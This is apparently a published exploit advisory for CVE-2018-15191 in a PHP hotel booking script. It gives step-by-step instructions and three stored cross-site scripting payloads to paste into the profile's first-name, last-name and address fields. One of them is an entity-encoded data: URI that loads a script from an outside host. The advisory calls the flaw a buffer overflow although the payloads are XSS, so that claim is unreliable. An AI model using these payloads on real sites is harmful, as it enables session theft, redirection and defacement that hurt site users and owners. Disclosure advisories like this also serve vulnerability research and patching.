*************************
# Exploit Title: Hotel Booking Script – 2.0.4 – has Buffer Overflow Via First name , Last name and Address
# Date: 07.08.2018
# Site Titel : Hotel Booking
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/hotel-booking-script/
# Category: Web Application
# Version: 2.0.4
# Exploit Author: Vikas Chaudhary
# Web: https://gkaim.com/
# Contact: https://gkaim.com/contact-us/
# Published on : https://gkaim.com/cve-2018-15191-vikas-chaudhary/
# Tested on: Windows 10 -Firefox
# CVE- CVE-2018-15191

*****************************
# VENDOR SUMMARY :- PHP Scripts Mall Pvt. Ltd. is a professional software selling portal offering wide range of innovative.
PHP Scripts Mall is a leading business and technology firm with 12 years of successful track record
in completion and implementation of numerous projects in various verticals and domains..
It has 300 plus PHP scripts ready to buy.

# DESCRIPTION :- BufferOverflow Vulnerability are found in Specified Vendor .
By uploading these types of malicious code an attacker can change or redirect the admin or guest user
to any infectious link or also can harm the full site by changing site interface .

***********************
Proof of Concept:-
————————-
1- Go to Site
2- Select => SIGN UP/IN => REGISTER=> and then fill the Form Click on REGISTER.
3-Goto your mail and Verify it.
4-Now come back to site and Sign in using your Verified mail and Password.
5-Select Profile=>Edit Profile and paste these Code in given parameter.

In First Name=>
<div id=d><x xmlns=”><iframe onload=javascript:alert(1)”></div> <script>d.innerHTML=d.innerHTML</script>

In Last Name =>
<a href=”data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203″>Vikas Chaudhary</a>

In Address =>
<div id=”div1″><input value=”“onmouseover=javascript:alert(1)”></div> <div id=”div2″></div><script>document.getElementById(“div2”).innerHTML = document.getElementById(“div1”).innerHTML;</script>

and click on SUBMIT

7- Now you will see that your web interface will be changed and you can’t be able to change your or edit your Profile .